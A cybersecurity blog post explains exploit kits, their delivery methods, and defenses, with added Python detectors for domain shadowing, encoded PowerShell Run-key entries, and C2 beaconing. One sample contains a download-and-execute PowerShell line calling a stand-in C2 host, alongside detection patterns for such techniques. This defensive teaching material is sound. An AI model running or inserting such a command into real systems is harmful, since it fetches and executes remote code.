Sage Advice - Cybersecurity Blog

Exploit Kit 101 - What You Need to Know

Back in the day, hackers needed to write their own code to exploit systems. But times have changed! Today’s hackers can license software, known as exploit kits, from other hackers – sometimes for less than a night on the town – that makes attacking your systems quicker and easier than ever before.

What is an exploit kit?

An exploit kit is a software system that runs on a web server, identifies software vulnerabilities on a visiting client’s machine, and exploits the vulnerabilities it finds. However, an exploit kit is not the "end game" malware, the ultimate reason the hacker wants into your system. It is the tool hackers use to break in – like a pick to a lock. Once it has broken in, it can upload and execute malicious code (malware).

Exploit kits are designed to be extremely easy to use. They are sold in cybercriminal circles, often with vulnerabilities already loaded onto them. Exploit kits are typically modular and include user interfaces that provide settings, controls, and statistics. This means hackers don’t need to be tech-savvy to use them. 

Many developers that license these kits are business-savvy and provide top-notch customer service. They are often well-funded, with a business model similar to that of most corporations – developers, customer support, management, etc.

How do exploit kits get installed?     

  • Phishing attacks. People are the weakest link in the security chain because we’re trusting by nature. Someone clicks on an enticing link, and the kit is downloaded and installed.

  • Drive-by downloads. If a website allows a viewer to input text – like a response in a discussion forum – a hacker can compromise the site by injecting code. Hackers also use ad networks, so a site that hasn’t been compromised can still serve up malicious content through ads. Exploit kits can be inadvertently downloaded just by visiting these legitimate sites.

  • Domain shadowing. First the hacker obtains domain registrar credentials through a successful attack, usually phishing. This allows them to add host records under an organization’s DNS domain and point those new hostnames at their own malicious IPs.

    For example, let's say you've determined that you will never worry about traffic to "somelocalcompany.com," and you whitelist the domain. That company falls victim to domain shadowing, and now you may have traffic going to "somemalicioushostinrussia.somelocalcompany.com" without even noticing it. So much for whitelisting by domain! Your systems are headed out to Russia to pick up some nasty code!
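A defender-side check for the domain-shadowing case above, added here as an illustration and not taken from the Sage post: it walks resolver log lines (constructed for this example) and flags any hostname under an allowlisted domain that is not in the organization's known host list, or that resolves outside the netblocks that domain's real hosts have used. The log format, the allowlist, the baseline hostnames and netblocks, and the addresses are all assumptions.

```python
import ipaddress

# Constructed resolver log lines (not from a real network):
# "<timestamp> <client ip> <queried name> <answer ip>"
DNS_LOG = """\
2016-03-01T09:00:01 10.1.1.25 www.somelocalcompany.com 203.0.113.10
2016-03-01T09:00:05 10.1.1.25 mail.somelocalcompany.com 203.0.113.11
2016-03-01T09:00:09 10.1.1.40 www.somelocalcompany.com 203.0.113.10
2016-03-01T09:01:13 10.1.1.40 somemalicioushostinrussia.somelocalcompany.com 198.51.100.77
2016-03-01T09:01:20 10.1.1.25 cdn.example.net 192.0.2.5
"""

# The domains you decided to trust wholesale (assumption for this example).
ALLOWLIST = {"somelocalcompany.com"}

# Baseline built from earlier, known-good traffic: which hostnames exist under
# each trusted domain, and which netblocks they have resolved to.
KNOWN_HOSTS = {"somelocalcompany.com": {"www", "mail"}}
KNOWN_NETS = {"somelocalcompany.com": [ipaddress.ip_network("203.0.113.0/24")]}


def parent_domain(qname, allowlist):
    """Return the allowlisted domain that qname falls under, or None."""
    labels = qname.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in allowlist:
            return candidate
    return None


def find_shadowed_hosts(log_text, allowlist=ALLOWLIST,
                        known_hosts=KNOWN_HOSTS, known_nets=KNOWN_NETS):
    """Flag names under a trusted domain that the baseline has never seen,
    or that resolve somewhere the domain's real hosts never have."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, qname, answer = line.split()
        qname = qname.lower().rstrip(".")
        domain = parent_domain(qname, allowlist)
        if domain is None:
            continue  # not under a trusted domain; other controls cover it
        host = qname[: -(len(domain) + 1)] if qname != domain else ""
        reasons = []
        if host and host not in known_hosts.get(domain, set()):
            reasons.append("hostname never seen under trusted domain")
        ip = ipaddress.ip_address(answer)
        if not any(ip in net for net in known_nets.get(domain, [])):
            reasons.append(f"resolves outside known netblocks ({answer})")
        if reasons:
            findings.append({"time": ts, "client": client, "qname": qname,
                             "answer": answer, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_shadowed_hosts(DNS_LOG):
        print(f"{f['time']} {f['client']} -> {f['qname']} ({f['answer']}): "
              + "; ".join(f["reasons"]))
```

The point of the two separate checks is that a shadowed hostname fails both: the name was never part of the legitimate zone, and it points at infrastructure the real company never used. Either one alone is worth an alert, because a domain-level allowlist would have let the traffic straight through.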

Why aren't my existing controls enough?

My users aren’t local admins. If your users aren’t local admins, they can’t install software, right? Well, non-admins can still write to specific folders on their PCs (e.g. ProgramData and their user profile); otherwise they wouldn't get any work done. That means hackers can also write to these folders without admin rights.

As you can imagine, with no installation wizards, no reboots, and no need for admin rights, the user sees nothing. Today's hackers just stick the malicious code where they can and then add a persistence mechanism so it survives a system reboot.

Our systems are fully patched. In theory – and in practice – a fully patched system is certainly less vulnerable to exploits. However, hackers have found a way around this as well. Besides the numerous "zero-day" exploits (vulnerabilities that vendors have not patched yet), we've seen code check whether a vulnerable program is installed and, if not, kindly install it for you! Then, of course, it proceeds to exploit it.

We use antivirus software. Antivirus is a very weak defender against exploit kits for a few different reasons.

First of all, it’s cheap. And if it’s cheap to license (or even if it’s not), the hackers have it, too. Hackers test their code against a myriad of antivirus, IDS, and IPS products to see if it gets detected. If it isn’t detected, they’ll use it. If it is detected, they’ll figure out why and fix it.

Next, many infections are now file-less. There is no executable on disk; the infection is simply a registry entry. The registry entry ends up in a Run key for either the local machine or the current user, and every time the system boots or that user logs in, a script runs. The script will most likely look like a bunch of gibberish; however, once decoded, you can see what is actually running. And what it says is typically… I want to talk to my malicious server.
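An added example, not code from the post, of what reviewing those Run keys can look like: given a set of constructed Run-key values, it finds PowerShell invocations carrying an -EncodedCommand argument, decodes the blob the way PowerShell does (base64 over UTF-16LE text), and reports the indicators a reviewer would care about, such as a hidden window or a download from a URL. The value names, command lines and the suspicious script are constructed samples; the indicator list is an assumption, a starting point rather than a complete signature set.

```python
import base64
import re


def _encode_ps(script):
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample: the script a hypothetical Run-key entry decodes to.
SUSPECT_SCRIPT = ("IEX (New-Object Net.WebClient)"
                  ".DownloadString('http://c2.example.invalid/stage')")

# Constructed Run-key values (name -> data), as you would see them when
# reviewing HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Not real hosts.
RUN_KEY_VALUES = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "Updater": "powershell.exe -NoP -W Hidden -EncodedCommand " + _encode_ps(SUSPECT_SCRIPT),
    "VpnHelper": 'powershell -nop -c "Start-Process vpnclient.exe"',
}

# PowerShell accepts unambiguous prefixes of -EncodedCommand; these are the common ones.
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)

# Things a reviewer wants surfaced (assumption: a starter list, not a full signature set).
INDICATORS = {
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "web client": re.compile(r"net\.webclient|invoke-webrequest|invoke-restmethod", re.I),
    "download": re.compile(r"downloadstring|downloadfile|downloaddata", re.I),
    "url": re.compile(r"https?://", re.I),
    "dynamic execution": re.compile(r"\biex\b|invoke-expression", re.I),
}


def decode_encoded_command(command_line):
    """Return the plaintext of an -EncodedCommand argument, or None if absent/undecodable."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # tolerate padding stripped by the author or the log
    try:
        return base64.b64decode(blob).decode("utf-16le", errors="replace")
    except ValueError:
        return None


def inspect_run_values(values):
    """Decode what each Run-key value would actually execute and list its indicators."""
    findings = []
    for name, data in values.items():
        decoded = None
        if re.search(r"powershell", data, re.I):
            decoded = decode_encoded_command(data)
        hits = ["encoded command"] if decoded is not None else []
        # Scan the command line minus the base64 blob, plus whatever it decoded to.
        scan_text = ENCODED_ARG.sub("", data) + "\n" + (decoded or "")
        hits += [label for label, rx in INDICATORS.items() if rx.search(scan_text)]
        if hits:
            findings.append({"name": name, "command": data,
                             "decoded": decoded, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in inspect_run_values(RUN_KEY_VALUES):
        print(f"[{f['name']}] {', '.join(f['indicators'])}")
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

Only the encoded entry is flagged: the OneDrive value is an ordinary signed binary path, and the VpnHelper entry, while it is PowerShell, neither hides its window nor reaches out to the network. Decoding before matching is the step that matters; the same patterns run against the raw base64 would see nothing but gibberish, exactly as the text above describes.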

Finally, antivirus doesn’t usually work if the payload is encrypted. All it can see is gibberish – no code or script – and the infection bypasses it entirely.

How can I protect my organization?

  1. Have a system for early detection and confirmation (e.g. nDiscovery with nAlert).
  2. Back up your data. This is critical – especially when dealing with ransomware.
  3. If you can block outbound traffic by GeoIP, and you have no business with hacker-havens such as Eastern Europe, Russia, etc. – block the traffic.
  4. If you have a proxy, block “unrated” sites. This can go a very long way to helping reduce your exposure.
  5. Use software restriction policies to block execution from \ProgramData and \Users. Note: This is not something to be taken lightly. Things will break and it needs to be tested thoroughly! Management buy-in is required.
  6. Stop all outbound web browsing. Note: This is definitely taking it to the extreme, and is not right (or plausible) for many organizations.  But it can work for some.  It’s the battle between keeping your end users happy and keeping the organization secure. This is a strategic decision that needs buy-in from the entire leadership team.    

Is there any hope?

The good news is that malware that never talks to another device isn’t going to hurt you – too bad that's exactly what it was created to do. So after an infection, the first thing malware often does is talk out to its command and control server. And when it starts talking, your network logs are going to see it.

Early detection by a trained human analyst can help you prevent an incident from becoming a breach, so be sure that you are consistently mining your logs for signs of infection.
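One way to mine logs for the check-in behavior described above, added as an example that is not part of the original post: it groups constructed proxy log lines by client and destination, measures the interval between requests, and flags pairs whose intervals are nearly constant (a low coefficient of variation), which is how malware polling a command and control server on a timer looks next to a human browsing. The log format, the thresholds and the sample addresses are assumptions.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log lines (not from a real network):
# "<iso timestamp> <client ip> <destination> <bytes>"
PROXY_LOG = """\
2016-03-01T09:00:00 10.1.1.40 198.51.100.77 412
2016-03-01T09:00:10 10.1.1.25 www.example.com 18233
2016-03-01T09:00:12 10.1.1.25 www.example.com 2048
2016-03-01T09:01:01 10.1.1.40 198.51.100.77 410
2016-03-01T09:02:00 10.1.1.40 198.51.100.77 415
2016-03-01T09:03:02 10.1.1.40 198.51.100.77 411
2016-03-01T09:03:40 10.1.1.25 www.example.com 90211
2016-03-01T09:04:01 10.1.1.40 198.51.100.77 413
2016-03-01T09:05:00 10.1.1.40 198.51.100.77 409
2016-03-01T09:10:05 10.1.1.25 www.example.com 5120
2016-03-01T09:10:06 10.1.1.25 www.example.com 700
2016-03-01T09:25:00 10.1.1.25 www.example.com 1330
"""


def parse_proxy_log(log_text):
    """Group request timestamps by (client, destination)."""
    sessions = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, dest, _bytes = line.split()
        sessions[(client, dest)].append(datetime.fromisoformat(ts))
    return sessions


def find_beacons(log_text, min_hits=5, max_cv=0.15):
    """Flag client/destination pairs that talk at near-constant intervals.

    min_hits and max_cv are tuning assumptions: fewer hits give too little
    signal, and a larger max_cv tolerates more jitter at the cost of false
    positives from things like auto-refreshing web pages.
    """
    findings = []
    for (client, dest), times in parse_proxy_log(log_text).items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean == 0:
            continue  # burst of identical timestamps; not a timer
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            findings.append({"client": client, "dest": dest, "hits": len(times),
                             "mean_interval": round(mean, 1), "cv": round(cv, 3)})
    return findings


if __name__ == "__main__":
    for b in find_beacons(PROXY_LOG):
        print(f"{b['client']} -> {b['dest']}: {b['hits']} hits, "
              f"every {b['mean_interval']}s (cv {b['cv']})")
```

The host talking to 198.51.100.77 about once a minute is flagged; the user browsing www.example.com makes more requests in total, but at human, irregular intervals. In practice you would pair this with the destination's reputation or rating (see the "unrated sites" control above) and with the GeoIP of the destination before paging an analyst.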



Image courtesy of num_skyman at FreeDigitalPhotos.

Topics: Malware, Ransomware, Cyber Defense

